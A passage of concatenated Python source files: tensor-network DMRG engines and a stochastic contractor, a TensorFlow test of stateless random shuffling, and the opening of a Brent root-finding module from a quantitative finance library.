left and right environment blocks
mps: MPS object
the initial mps
mpo: MPO object
Hamiltonian in MPO format
name: str
the name of the simulation
lb: np.ndarray of shape (D,D,M), or None
the left environment;
lb has to have shape (mps[0].shape[0],mps[0].shape[0],mpo[0].shape[0])
if None, obc are assumed, and lb=ones((mps[0].shape[0],mps[0].shape[0],mpo[0].shape[0]))
rb: np.ndarray of shape (D,D,M), or None
the right environment
rb has to have shape (mps[-1].shape[1],mps[-1].shape[1],mpo[-1].shape[1])
if None, obc are assumed, and rb=ones((mps[-1].shape[1],mps[-1].shape[1],mpo[-1].shape[1]))
"""
self.mps = mps
self.mpo = mpo
if not self.mps.dtype == self.mpo.dtype:
raise TypeError('the types of mps and mpo are not compatible')
if len(mps) != len(mpo):
raise ValueError('len(mps)!=len(mpo)')
self.mps.position(0)
self.lb = lb
self.rb = rb
self.left_envs = {0: self.lb}
self.right_envs = {len(mps) - 1: self.rb}
def __len__(self):
"""
return the length of the simulation
"""
return len(self.mps)
@property
def dtype(self):
"""
return the data-type of the MPSSimulationBase
type is obtained from applying np.result_type
to the mps and mpo objects
"""
assert (self.mps.dtype == self.mpo.dtype)
return self.mps.dtype
@staticmethod
def add_layer(B,
mps_tensor,
mpo_tensor,
conj_mps_tensor,
direction,
walltime_log=None):
"""
adds an mps-mpo-mps layer to a left or right block "E"; used in dmrg to calculate the left and right
environments
Parameters:
---------------------------
B: Tensor object
a tensor of shape (D1,D1',M1) (for direction>0) or (D2,D2',M2) (for direction<0)
mps_tensor: Tensor object of shape =(Dl,Dr,d)
mpo_tensor: Tensor object of shape = (Ml,Mr,d,d')
conj_mps_tensor: Tensor object of shape =(Dl',Dr',d')
the mps tensor on the conjugated side
this tensor will be complex conjugated inside the routine; usually, the user will like to pass
the unconjugated tensor
direction: int or str
direction in (1,'l','left'): add a layer to the right of ```B```
direction in (-1,'r','right'): add a layer to the left of ```B```
Return:
-----------------
Tensor of shape (Dr,Dr',Mr) for direction in (1,'l','left')
Tensor of shape (Dl,Dl',Ml) for direction in (-1,'r','right')
"""
if walltime_log:
t1 = time.time()
out = misc_mps.add_layer(
B, mps_tensor, mpo_tensor, conj_mps_tensor, direction=direction)
if walltime_log:
walltime_log(lan=[], QR=[], add_layer=[time.time() - t1], num_lan=[])
return out
def position(self, n):
"""
shifts the center position of mps to bond n, and updates left and right environments
accordingly; Left blocks at site > n are None, and right blocks at site < n are None
Note that right blocks are indexed by site as well, i.e. self.right_envs[len(mps) - 1] is self.rb,
self.right_envs[len(mps) - 2] is the second right-most R-block, and so on
Parameters:
------------------------------------
n: int
the bond to which the position should be shifted
returns: self
"""
if n > len(self.mps):
raise IndexError("MPSSimulationBase.position(n): n>len(mps)")
if n < 0:
raise IndexError("MPSSimulationBase.position(n): n<0")
if n == self.mps.pos:
return
elif n > self.mps.pos:
pos = self.mps.pos
if self.walltime_log:
t1 = time.time()
self.mps.position(n)
if self.walltime_log:
self.walltime_log(
lan=[], QR=[time.time() - t1], add_layer=[], num_lan=[])
for m in range(pos, n):
self.left_envs[m + 1] = self.add_layer(
self.left_envs[m],
self.mps[m],
self.mpo[m],
self.mps[m],
direction=1,
walltime_log=self.walltime_log)
elif n < self.mps.pos:
pos = self.mps.pos
if self.walltime_log:
t1 = time.time()
self.mps.position(n)
if self.walltime_log:
self.walltime_log(
lan=[], QR=[time.time() - t1], add_layer=[], num_lan=[])
for m in reversed(range(n, pos)):
self.right_envs[m - 1] = self.add_layer(
self.right_envs[m],
self.mps[m],
self.mpo[m],
self.mps[m],
direction=-1,
walltime_log=self.walltime_log)
for m in range(n + 1, len(self.mps) + 1):
try:
del self.left_envs[m]
except KeyError:
pass
for m in range(-1, n - 1):
try:
del self.right_envs[m]
except KeyError:
pass
return self
def update(self):
"""
shift center site of the MPSSimulationBase to 0 and recalculate all left and right blocks
"""
self.mps.position(0)
self.compute_left_envs()
self.compute_right_envs()
return self
class DMRGUnitCellEngine(MPSSimulationBase):
"""
DMRGUnitCellEngine
simulation container for density matrix renormalization group optimization
"""
def __init__(self, mps, mpo, lb, rb, name='DMRG'):
"""
initialize an MPS object
mps: MPS object
the initial mps
mpo: MPO object
Hamiltonian in MPO format
name: str
the name of the simulation
lb,rb: None or np.ndarray
left and right environment boundary conditions
if None, obc are assumed
user can provide lb and rb to fix the boundary condition of the mps
shapes of lb, rb, mps[0] and mps[-1] have to be consistent
"""
self.walltime_log = None
super().__init__(mps=mps, mpo=mpo, name=name, lb=lb, rb=rb)
self.compute_right_envs()
def compute_left_envs(self):
"""
compute all left environment blocks
up to self.mps.position; all blocks for site > self.mps.position are set to None
"""
self.left_envs = {}
self.left_envs[0] = self.lb
for n in range(self.mps.pos):
self.left_envs[n + 1] = self.add_layer(
B=self.left_envs[n],
mps_tensor=self.mps[n],
mpo_tensor=self.mpo[n],
conj_mps_tensor=self.mps[n],
direction=1,
walltime_log=self.walltime_log)
def compute_right_envs(self):
"""
compute all right environment blocks
up to self.mps.position; all blocks for site < self.mps.position are set to None
"""
self.right_envs = {}
self.right_envs[len(self.mps) - 1] = self.rb
for n in reversed(range(self.mps.pos, len(self.mps))):
self.right_envs[n - 1] = self.add_layer(
B=self.right_envs[n],
mps_tensor=self.mps[n],
mpo_tensor=self.mpo[n],
conj_mps_tensor=self.mps[n],
direction=-1,
walltime_log=self.walltime_log)
def _optimize_2s_local(self,
thresh=1E-10,
D=None,
ncv=40,
Ndiag=10,
landelta=1E-5,
landeltaEta=1E-5,
verbose=0):
raise NotImplementedError()
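# NOTE: the two-site update below is unfinished. It is unreachable because of
# the raise above and refers to names (e, opt, merge_data, mps_merge_data)
# that are never defined.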
mpol = self.mpo[self.mpo.pos - 1]
mpor = self.mpo[self.mpo.pos]
Ml, Mc, dl, dlp = mpol.shape
Mc, Mr, dr, drp = mpor.shape
mpo = tf.reshape(
ncon.ncon([mpol, mpor], [[-1, 1, -3, -5], [1, -2, -4, -6]]),
[Ml, Mr, dl * dr, dlp * drp])
initial = ncon.ncon(
[self.mps[self.mps.pos - 1], self.mps.mat, self.mps[self.mps.pos]],
[[-1, -2, 1], [1, 2], [2, -3, -4]])
Dl, dl, dr, Dr = initial.shape
tf.reshape(initial, [Dl, dl * dr, Dr])
if self.walltime_log:
t1 = time.time()
nit, vecs, alpha, beta = LZ.do_lanczos(
L=self.left_envs[self.mps.pos - 1],
mpo=mpo,
R=self.right_envs[self.mps.pos],
initial_state=initial,
ncv=ncv,
delta=landelta)
if self.walltime_log:
self.walltime_log(
lan=[(time.time() - t1) / float(nit)] * int(nit),
QR=[],
add_layer=[],
num_lan=[int(nit)])
temp = tf.reshape(
tf.reshape(opt, [
self.mps.D[self.mps.pos - 1], dlp, drp, self.mps.D[self.mps.pos + 1]
]), [])
opt.split(mps_merge_data).transpose(0, 2, 3, 1).merge([[0, 1], [2, 3]])
U, S, V = temp.svd(truncation_threshold=thresh, D=D)
Dnew = S.shape[0]
if verbose > 0:
stdout.write(
"\rTS-DMRG it=%i/%i, sites=(%i,%i)/%i: optimized E=%.16f+%.16f at D=%i"
% (self._it, self.Nsweeps, self.mps.pos - 1, self.mps.pos,
len(self.mps), tf.real(e), tf.imag(e), Dnew))
stdout.flush()
if verbose > 1:
print("")
Z = np.sqrt(ncon.ncon([S, S], [[1], [1]]))
self.mps.mat = S.diag() / Z
self.mps[self.mps.pos - 1] = U.split([merge_data[0],
[U.shape[1]]]).transpose(0, 2, 1)
self.mps[self.mps.pos] = V.split([[V.shape[0]], merge_data[1]]).transpose(
0, 2, 1)
self.left_envs[self.mps.pos] = self.add_layer(
B=self.left_envs[self.mps.pos - 1],
mps_tensor=self.mps[self.mps.pos - 1],
mpo_tensor=self.mpo[self.mps.pos - 1],
conj_mps_tensor=self.mps[self.mps.pos - 1],
direction=1)
self.right_envs[self.mps.pos - 1] = self.add_layer(
B=self.right_envs[self.mps.pos],
mps_tensor=self.mps[self.mps.pos],
mpo_tensor=self.mpo[self.mps.pos],
conj_mps_tensor=self.mps[self.mps.pos],
direction=-1)
return e
def _optimize_1s_local(self,
site,
sweep_dir,
ncv=40,
Ndiag=10,
landelta=1E-5,
landeltaEta=1E-5,
verbose=0):
if sweep_dir in (-1, 'r', 'right'):
if self.mps.pos != site:
raise ValueError(
'_optimize_1s_local for sweep_dir={2}: site={0} != mps.pos={1}'.
format(site, self.mps.pos, sweep_dir))
if sweep_dir in (1, 'l', 'left'):
if self.mps.pos != (site + 1):
raise ValueError(
'_optimize_1s_local for sweep_dir={2}: site={0}, mps.pos={1}'.
format(site, self.mps.pos, sweep_dir))
if sweep_dir in (-1, 'r', 'right'):
#NOTE (martin) don't use get_tensor here
initial = ncon.ncon([self.mps.mat, self.mps[site]],
[[-1, 1], [1, -2, -3]])
elif sweep_dir in (1, 'l', 'left'):
#NOTE (martin) don't use get_tensor here
initial = ncon.ncon([self.mps[site], self.mps.mat],
[[-1, -2, 1], [1, -3]])
if self.walltime_log:
t1 = time.time()
nit, vecs, alpha, beta = LZ.do_lanczos(
L=self.left_envs[site],
mpo=self.mpo[site],
R=self.right_envs[site],
initial_state=initial,
ncv=np.min([
ncv,
int(initial.shape[0]) * int(initial.shape[1]) * int(
initial.shape[2])
]),
delta=landelta)
if self.walltime_log:
self.walltime_log(
lan=[(time.time() - t1) / float(nit)] * int(nit),
QR=[],
add_layer=[],
num_lan=[int(nit)])
e, opt = LZ.tridiag(vecs, alpha, beta)
Dnew = opt.shape[2]
# if verbose == (-1):
# print(f"SS-DMRG site={site}: optimized E={e}")
if verbose > 0:
stdout.write(
"\rSS-DMRG it=%i/%i, site=%i/%i: optimized E=%.16f+%.16f at D=%i" %
(self._it, self.Nsweeps, site, len(self.mps), np.real(e), np.imag(e),
Dnew))
stdout.flush()
if verbose > 1:
print("")
if self.walltime_log:
t1 = time.time()
if sweep_dir in (-1, 'r', 'right'):
A, mat, Z = misc_mps.prepare_tensor_QR(opt, direction='l')
A /= Z
elif sweep_dir in (1, 'l', 'left'):
mat, B, Z = misc_mps.prepare_tensor_QR(opt, direction='r')
B /= Z
if self.walltime_log:
self.walltime_log(lan=[], QR=[time.time() - t1], add_layer=[], num_lan=[])
self.mps.mat = mat
if sweep_dir in (-1, 'r', 'right'):
self.mps._tensors[site] = A
self.mps.pos += 1
self.left_envs[site + 1] = self.add_layer(
B=self.left_envs[site],
mps_tensor=self.mps[site],
mpo_tensor=self.mpo[site],
conj_mps_tensor=self.mps[site],
direction=1,
walltime_log=self.walltime_log)
elif sweep_dir in (1, 'l', 'left'):
self.mps._tensors[site] = B
self.mps.pos = site
self.right_envs[site - 1] = self.add_layer(
B=self.right_envs[site],
mps_tensor=self.mps[site],
mpo_tensor=self.mpo[site],
conj_mps_tensor=self.mps[site],
direction=-1,
walltime_log=self.walltime_log)
return e
def run_one_site(self,
Nsweeps=4,
precision=1E-6,
ncv=40,
verbose=0,
delta=1E-10,
deltaEta=1E-10,
walltime_log=None):
"""
do a one-site DMRG optimization for an open system
Parameters:
Nsweeps: int
number of left-right sweeps
precision: float
desired precision of the ground state energy
ncv: int
number of krylov vectors
verbose: int
verbosity flag
delta: float
orthogonality threshold; once the next vector of the iteration is orthogonal to the previous ones
within ```delta``` precision, iteration is terminated
deltaEta: float
desired precision of the energies; once eigenvalues of the tridiagonal Hamiltonian are converged within ```deltaEta```
iteration is terminated
walltime_log: callable or None
if not None, walltime_log is passed to do_lanczos, add_layer and prepare_tensor_QR to
log runtimes
"""
self.walltime_log = walltime_log
converged = False
energy = 1E100
self._it = 1
self.Nsweeps = Nsweeps
while not converged:
self.position(0)
#the part outside the loop covers the len(self)==1 case
e = self._optimize_1s_local(
site=0,
sweep_dir='right',
ncv=ncv,
landelta=delta,
landeltaEta=deltaEta,
verbose=verbose)
for n in range(1, len(self.mps) - 1):
#_optimize_1site_local shifts the center site internally
e = self._optimize_1s_local(
site=n,
sweep_dir='right',
ncv=ncv,
landelta=delta,
landeltaEta=deltaEta,
verbose=verbose)
#prepare for the left sweep: move center all the way to the right
self.position(len(self.mps))
for n in range(len(self.mps) - 1, 0, -1):
#_optimize_1site_local shifts the center site internally
e = self._optimize_1s_local(
site=n,
sweep_dir='left',
ncv=ncv,
landelta=delta,
landeltaEta=deltaEta,
verbose=verbose)
if np.abs(e - energy) < precision:
converged = True
energy = e
self._it += 1
if self._it > Nsweeps:
if verbose > 0:
print()
print(
'dmrg did not converge to desired precision {0} after {1} iterations'
.format(precision, Nsweeps))
break
return e
class FiniteDMRGEngine(DMRGUnitCellEngine):
def __init__(self, mps, mpo, name='FiniteDMRG'):
# if not isinstance(mps, FiniteMPSCentralGauge):
# raise TypeError(
# 'in FiniteDMRGEngine.__init__(...): mps of type FiniteMPSCentralGauge expected, got {0}'
# .format(type(mps)))
lb = tf.ones([mps.D[0], mps.D[0], mpo.D[0]], dtype=mps.dtype)
rb = tf.ones([mps.D[-1], mps.D[-1], mpo.D[-1]], dtype=mps.dtype)
super().__init__(mps=mps, mpo=mpo, lb=lb, rb=rb, name=name)
class InfiniteDMRGEngine(DMRGUnitCellEngine):
def __init__(self,
mps,
mpo,
name='InfiniteDMRG',
precision=1E-12,
precision_canonize=1E-12,
nmax=1000,
nmax_canonize=1000,
ncv=40,
numeig=1,
pinv=1E-20,
power_method=False):
# if not isinstance(mps, InfiniteMPSCentralGauge):
# raise TypeError(
# 'in InfiniteDMRGEngine.__init__(...): mps of type InfiniteMPSCentralGauge expected, got {0}'
# .format(type(mps)))
mps.restore_form(
precision=precision_canonize,
ncv=ncv,
nmax=nmax_canonize,
numeig=numeig,
power_method=power_method,
pinv=pinv) #this leaves state in left-orthogonal form
lb, hl = misc_mps.compute_steady_state_Hamiltonian_GMRES(
'l',
mps,
mpo,
left_dominant=tf.diag(tf.ones(mps.D[-1], dtype=mps.dtype)),
right_dominant=ncon.ncon([mps.mat, tf.conj(mps.mat)],
[[-1, 1], [-2, 1]]),
precision=precision,
nmax=nmax)
rmps = mps.get_right_orthogonal_imps(
precision=precision_canonize,
ncv=ncv,
nmax=nmax_canonize,
numeig=numeig,
pinv=pinv,
restore_form=False)
rb, hr = misc_mps.compute_steady_state_Hamiltonian_GMRES(
'r',
rmps,
mpo,
right_dominant=tf.diag(tf.ones(mps.D[0], dtype=mps.dtype)),
left_dominant=ncon.ncon([mps.mat, tf.conj(mps.mat)],
[[1, -1], [1, -2]]),
precision=precision,
nmax=nmax)
left_dominant = ncon.ncon([mps.mat, tf.conj(mps.mat)], [[1, -1], [1, -2]])
out = mps.unitcell_transfer_op('l', left_dominant)
super().__init__(mps=mps, mpo=mpo, lb=lb, rb=rb, name=name)
def shift_unitcell(self, sites):
"""
"""
self.position(sites)
new_lb = self.left_envs[sites]
new_rb = self.right_envs[sites - 1]
centermatrix = self.mps.mat
self.mps.position(len(self.mps)) #move centermatrix to the right
new_center_matrix = ncon.ncon([self.mps.mat, self.mps.connector],
[[-1, 1], [1, -2]])
self.mps.pos = sites
self.mps.mat = centermatrix
self.mps.position(0)
new_center_matrix = ncon.ncon([new_center_matrix, self.mps.mat],
[[-1, 1], [1, -2]])
tensors = [self.mps[n] for n in range(sites, len(self.mps))
] + [self.mps[n] for n in range(sites)]
self.mps._tensors = tensors
self.mpo._tensors = [self.mpo[n] for n in range(sites, len(self.mps))
] + [self.mpo[n] for n in range(sites)]
self.mps.connector = tf.linalg.inv(centermatrix)
self.mps.mat = new_center_matrix
self.mps.pos = len(self.mps) - sites
self.lb = new_lb
self.rb = new_rb
self.update()
def run_one_site(self,
Nsweeps=1,
precision=1E-6,
ncv=40,
verbose=0,
delta=1E-10,
deltaEta=1E-10):
self._idmrg_it = 0
converged = False
eold = 0.0
while not converged:
e = super().run_one_site(
Nsweeps=1,
precision=precision,
ncv=ncv,
verbose=verbose - 1,
delta=delta,
deltaEta=deltaEta)
self.shift_unitcell(sites=len(self.mps) // 2)
if verbose > 0:
stdout.write(
"\rSS-IDMRG it=%i/%i, energy per unit-cell E/N=%.16f+%.16f" %
(self._idmrg_it, Nsweeps, np.real((e - eold) / len(self.mps)),
np.imag((e - eold) / len(self.mps))))
stdout.flush()
if verbose > 1:
print('')
eold = e
self._idmrg_it += 1
if self._idmrg_it > Nsweeps:
converged = True
break
```
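A hedged usage sketch for `FiniteDMRGEngine` (illustrative only: the `FiniteMPSCentralGauge.random` constructor and the `Hamiltonians.FiniteTFI` MPO helper are assumptions about the surrounding experiments code and may differ in the actual repository):
```python
import numpy as np
import tensorflow as tf
tf.enable_eager_execution()

from matrixproductstates import FiniteMPSCentralGauge  # same import used by DMRG.py
import Hamiltonians as H  # assumed sibling module providing a TFI MPO helper

N, d, D = 32, 2, 16
# Hypothetical constructors: a random finite MPS and a transverse-field Ising MPO.
mps = FiniteMPSCentralGauge.random(d=[d] * N, D=[D] * (N - 1), dtype=tf.float64)
mpo = H.FiniteTFI(Jx=np.ones(N - 1), Bz=np.ones(N), dtype=tf.float64)

dmrg = FiniteDMRGEngine(mps, mpo, name='TFI_DMRG')
energy = dmrg.run_one_site(Nsweeps=4, precision=1E-8, ncv=20, verbose=1)
print('ground-state energy:', energy)
```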
#### File: tensornetwork/contractors/stochastic_contractor.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
from typing import Tuple, Set, Optional, Dict
from tensornetwork import network
from tensornetwork import network_components
def find_parallel(edge: network_components.Edge
) -> Tuple[Set[network_components.Edge], int]:
"""Finds all edges shared between the nodes connected with the given edge.
Args:
edge: A non-dangling edge between two different nodes.
Returns:
parallel_edges: Edges that are parallel to the given edge.
parallel_dim: Product of sizes of all parallel edges.
"""
if edge.is_dangling():
raise ValueError(
"Cannot find parallel edges for dangling edge {}".format(edge))
nodes = {edge.node1, edge.node2}
parallel_dim = 1
parallel_edges = set()
for e in edge.node1.edges:
if set(e.get_nodes()) == nodes:
parallel_edges.add(e)
edge_size = list(e.node1.get_tensor().shape)[e.axis1]
if edge_size is not None:
parallel_dim *= edge_size
return parallel_edges, parallel_dim
def contract_trace_edges(net: network.TensorNetwork, none_value: int = 1
) -> Tuple[network.TensorNetwork,
Dict[network_components.Node, int],
Dict[network_components.Node, int]]:
"""Contracts trace edges and calculate tensor sizes for every node.
Tensor size is defined as the product of sizes of each of edges (axes).
Args:
net: TensorNetwork to contract all the trace edges of.
none_value: The value that None dimensions contribute to the tensor size.
Unit (default) means that None dimensions are neglected.
Returns:
net: Given TensorNetwork with all its trace edges contracted.
node_sizes: Map from nodes in the network to their total size.
node_sizes_none: Map from nodes that have at least one None dimension to
their size.
"""
# Keep node sizes in memory for cost calculation
node_sizes, node_sizes_none = dict(), dict()
initial_node_set = set(net.nodes_set)
for node in initial_node_set:
trace_edges, flag_none, total_dim = set(), False, 1
new_node = node
for edge, dim in zip(node.edges, list(node.get_tensor().shape)):
if edge.node1 is edge.node2:
if edge not in trace_edges:
# Contract trace edge
new_node = net.contract(edge)
trace_edges.add(edge)
else:
if dim is None:
total_dim *= none_value
flag_none = True
else:
total_dim *= dim
if flag_none:
node_sizes_none[new_node] = total_dim
else:
node_sizes[new_node] = total_dim
return net, node_sizes, node_sizes_none
def stochastic(net: network.TensorNetwork,
max_rejections: int, threshold: Optional[int] = None,
none_value: int = 1) -> network.TensorNetwork:
"""Contracts a connected network by stochastically picking edges.
Algorithm 2 in page 7 of https://doi.org/10.1371/journal.pone.0208510.
Cost calculation is slightly modified here:
If A and B are the tensors that share the given `edge`, cost is defined as:
cost = dims(A * B) - max(dims(A), dims(B)), where
* denotes contraction of all shared edges (`contract_parallel`) and
dims(X) is the total dimension of tensor X (product of sizes of all axes).
Args:
net: Connected TensorNetwork to contract fully.
max_rejections: Maximum number of rejections before you increase threshold.
threshold: Initial value for the threshold.
none_value: The value of None dimensions in the cost calculation.
Returns:
net: TensorNetwork with a single node after fully contracting.
"""
net, node_sizes, node_sizes_none = contract_trace_edges(net, none_value)
if threshold is None:
# Set threshold as the maximum tensor size in the network
# ignoring nodes with None sizes.
threshold = max(node_sizes.values())
node_sizes.update(node_sizes_none)
rejections = 0
nondangling_edges = net.get_all_nondangling()
while nondangling_edges:
edge = random.choice(tuple(nondangling_edges))
shared_edges, shared_dim = find_parallel(edge)
new_dim = ((node_sizes[edge.node1] // shared_dim) *
(node_sizes[edge.node2] // shared_dim))
cost = new_dim - max(node_sizes[edge.node1], node_sizes[edge.node2])
if cost <= threshold:
node_sizes.pop(edge.node1)
node_sizes.pop(edge.node2)
node_sizes[net.contract_parallel(edge)] = new_dim
nondangling_edges -= shared_edges
rejections = 0
else:
rejections += 1
if rejections > max_rejections:
threshold *= 2
rejections = 0
return net
``` |
{
"source": "0xflotus/tf-quant-finance",
"score": 2
} |
#### File: math/random/stateless_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tf_quant_finance.math.random import stateless
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import,g-import-not-at-top
class StatelessRandomOpsTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
def testOutputIsPermutation(self):
"""Checks that stateless_random_shuffle outputs a permutation."""
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
identity_permutation = tf.range(10, dtype=dtype)
random_shuffle_seed_1 = stateless.stateless_random_shuffle(
identity_permutation, seed=tf.constant((1, 42), tf.int64))
random_shuffle_seed_2 = stateless.stateless_random_shuffle(
identity_permutation, seed=tf.constant((2, 42), tf.int64))
# Check that the shuffles are of the correct dtype
for shuffle in (random_shuffle_seed_1, random_shuffle_seed_2):
np.testing.assert_equal(shuffle.dtype, dtype.as_numpy_dtype)
random_shuffle_seed_1 = self.evaluate(random_shuffle_seed_1)
random_shuffle_seed_2 = self.evaluate(random_shuffle_seed_2)
identity_permutation = self.evaluate(identity_permutation)
# Check that the shuffles are different
self.assertTrue(
np.abs(random_shuffle_seed_1 - random_shuffle_seed_2).max())
# Check that the shuffles are indeed permutations
for shuffle in (random_shuffle_seed_1, random_shuffle_seed_2):
self.assertAllEqual(set(shuffle), set(identity_permutation))
@test_util.run_in_graph_and_eager_modes
def testOutputIsStateless(self):
"""Checks that stateless_random_shuffle is stateless."""
random_permutation_next_call = None
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
random_permutation = stateless.stateless_random_shuffle(
tf.range(10, dtype=dtype), seed=(100, 42))
random_permutation_first_call = self.evaluate(random_permutation)
if random_permutation_next_call is not None:
# Checks that the values are the same across different dtypes
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
random_permutation_next_call = self.evaluate(random_permutation)
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
@test_util.run_in_graph_and_eager_modes
def testOutputIsIndependentOfInputValues(self):
"""stateless_random_shuffle output is independent of input_tensor values."""
# Generate a sorted array of random numbers to verify that the result
# is independent of `input_tensor` values
np.random.seed(25)
random_input = np.random.normal(size=[10])
random_input.sort()
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
# Permutation of a sequence [0, 1, .., 9]
random_permutation = stateless.stateless_random_shuffle(
tf.range(10, dtype=dtype), seed=(100, 42))
random_permutation = self.evaluate(random_permutation)
# Shuffle `random_input` with the same seed
random_shuffle_control = stateless.stateless_random_shuffle(
random_input, seed=(100, 42))
random_shuffle_control = self.evaluate(random_shuffle_control)
# Checks that the generated permutation does not depend on the underlying
# values
np.testing.assert_array_equal(
np.argsort(random_permutation), np.argsort(random_shuffle_control))
@test_util.run_v1_only("Sessions are not available in TF2.0")
def testOutputIsStatelessSession(self):
"""Checks that stateless_random_shuffle is stateless across Sessions."""
random_permutation_next_call = None
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
random_permutation = stateless.stateless_random_shuffle(
tf.range(10, dtype=dtype), seed=tf.constant((100, 42), tf.int64))
with tf.Session() as sess:
random_permutation_first_call = sess.run(random_permutation)
if random_permutation_next_call is not None:
# Checks that the values are the same across different dtypes
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
with tf.Session() as sess:
random_permutation_next_call = sess.run(random_permutation)
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
@test_util.run_in_graph_and_eager_modes
def testMultiDimensionalShape(self):
"""Check that stateless_random_shuffle works with multi-dim shapes."""
for dtype in (tf.int32, tf.int64, tf.float32, tf.float64):
input_permutation = tf.constant([[[1], [2], [3]], [[4], [5], [6]]],
dtype=dtype)
random_shuffle = stateless.stateless_random_shuffle(
input_permutation, seed=(1, 42))
random_permutation_first_call = self.evaluate(random_shuffle)
random_permutation_next_call = self.evaluate(random_shuffle)
input_permutation = self.evaluate(input_permutation)
# Check that the dtype is correct
np.testing.assert_equal(random_permutation_first_call.dtype,
dtype.as_numpy_dtype)
# Check that the shuffles are the same
np.testing.assert_array_equal(random_permutation_first_call,
random_permutation_next_call)
# Check that the output shape is correct
np.testing.assert_equal(random_permutation_first_call.shape,
input_permutation.shape)
if __name__ == "__main__":
tf.test.main()
```
#### File: tf_quant_finance/math/root_search.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
BrentResults = collections.namedtuple(
"BrentResults",
[
# A tensor containing the best estimate. If the search was successful,
# this estimate is a root of the objective function.
"estimated_root",
# A tensor containing the value of the objective function at the best
# estimate. If the search was successful, then this is close to 0.
"objective_at_estimated_root",
# A tensor containing number of iterations performed for each pair of
# starting points.
"num_iterations",
# Scalar boolean tensor indicating whether the best estimate is a root
# within the tolerance specified for the search.
"converged",
])
# Values which remain fixed across all root searches (except for tensor dtypes
# and shapes).
_BrentSearchConstants = collections.namedtuple("_BrentSearchConstants", [
"false",
"zero",
"zero_value",
])
# Values which are updated during the root search.
_BrentSearchState = collections.namedtuple("_BrentSearchState", [
"best_estimate",
"value_at_best_estimate",
"last_estimate",
"value_at_last_estimate",
"contrapoint",
"value_at_contrapoint",
"step_to_best_estimate",
"step_to_last_estimate",
"num_iterations",
"finished",
])
# Values which remain fixed for a given root search.
_BrentSearchParams = collections.namedtuple("_BrentSearchParams", [
"objective_fn",
"max_iterations",
"absolute_root_tolerance",
"relative_root_tolerance",
"function_tolerance",
"stopping_policy_fn",
])
def _swap_where(condition, x, y):
"""Swaps the elements of `x` and `y` based on `condition`.
Args:
condition: A `Tensor` of dtype bool.
x: A `Tensor` with the same shape as `condition`.
y: A `Tensor` with the same shape and dtype as `x`.
Returns:
Two `Tensors` with the same shape as `x` and `y`.
"""
return tf.where(condition, y, x), tf.where(condition, x, y)
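# Illustration (added comment): with condition=[True, False], x=[1, 2], y=[3, 4]
# this returns ([3, 2], [1, 4]), i.e. the elements are swapped wherever the
# condition holds.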
def _secant_step(x1, x2, y1, y2):
"""Returns the step size at the current position if using the secant method.
This function is meant for exclusive use by the `_brent_loop_body` function:
- It does not guard against divisions by zero, and instead assumes that `y1`
is distinct from `y2`. The `_brent_loop_body` function guarantees this
property.
- It does not guard against overflows which may occur if the difference
between `y1` and `y2` is small while that between `x1` and `x2` is not.
In this case, the resulting step size will be larger than `bisection_step`
and thus ignored by the `_brent_loop_body` function.
Args:
x1: `Tensor` containing the current position.
x2: `Tensor` containing the previous position.
y1: `Tensor` containing the value of `objective_fn` at `x1`.
y2: `Tensor` containing the value of `objective_fn` at `x2`.
Returns:
A `Tensor` with the same shape and dtype as `x1`.
"""
x_difference = x1 - x2
y_difference = y1 - y2
return -y1 * x_difference / y_difference
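# Worked example (added comment): for (x1, y1) = (2, 1) and (x2, y2) = (1, -1)
# the secant line through the two points crosses zero at x = 1.5, so the step
# returned from x1 is -y1 * (x1 - x2) / (y1 - y2) = -1 * 1 / 2 = -0.5.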
def _quadratic_interpolation_step(x1, x2, x3, y1, y2, y3):
"""Returns the step size to use when using quadratic interpolation.
This function is meant for exclusive use by the `_brent_loop_body` function.
It does not guard against divisions by zero, and instead assumes that `y1` is
distinct from `y2` and `y3`. The `_brent_loop_body` function guarantees this
property.
Args:
x1: `Tensor` of any shape and real dtype containing the first position used
for extrapolation.
x2: `Tensor` of the same shape and dtype as `x1` containing the second
position used for extrapolation.
x3: `Tensor` of the same shape and dtype as `x1` containing the third
position used for extrapolation.
y1: `Tensor` containing the value of the interpolated function at `x1`.
y2: `Tensor` containing the value of interpolated function at `x2`.
y3: `Tensor` containing the value of interpolated function at `x3`.
Returns:
A `Tensor` with the same shape and dtype as `x1`.
"""
r2 = (x2 - x1) / (y2 - y1)
r3 = (x3 - x1) / (y3 - y1)
return -x1 * (x3 * r3 - x2 * r2) / (r3 * r2 * (x3 - x2))
def default_relative_root_tolerance(dtype):
"""Returns the default relative root tolerance used for a TensorFlow dtype."""
return 4 * np.finfo(dtype.as_numpy_dtype()).eps
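# For example, for tf.float64 this is 4 * np.finfo(np.float64).eps ~= 8.9e-16.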
def _should_stop(state, stopping_policy_fn):
"""Indicates whether the overall Brent search should continue.
Args:
state: A Python `_BrentSearchState` namedtuple.
stopping_policy_fn: Python `callable` controlling the algorithm termination.
Returns:
A boolean value indicating whether the overall search should continue.
"""
return tf.convert_to_tensor(
stopping_policy_fn(state.finished), name="should_stop", dtype=tf.bool)
# This is a direct translation of the Brent root-finding method.
# Each operation is guarded by a call to `tf.where` to avoid performing
# unnecessary calculations.
def _brent_loop_body(state, params, constants):
"""Performs one iteration of the Brent root-finding algorithm.
Args:
state: A Python `_BrentSearchState` namedtuple.
params: A Python `_BrentSearchParams` namedtuple.
constants: A Python `_BrentSearchConstants` namedtuple.
Returns:
The `Tensor`s to use for the next iteration of the algorithm.
"""
best_estimate = state.best_estimate
last_estimate = state.last_estimate
contrapoint = state.contrapoint
value_at_best_estimate = state.value_at_best_estimate
value_at_last_estimate = state.value_at_last_estimate
value_at_contrapoint = state.value_at_contrapoint
step_to_best_estimate = state.step_to_best_estimate
step_to_last_estimate = state.step_to_last_estimate
num_iterations = state.num_iterations
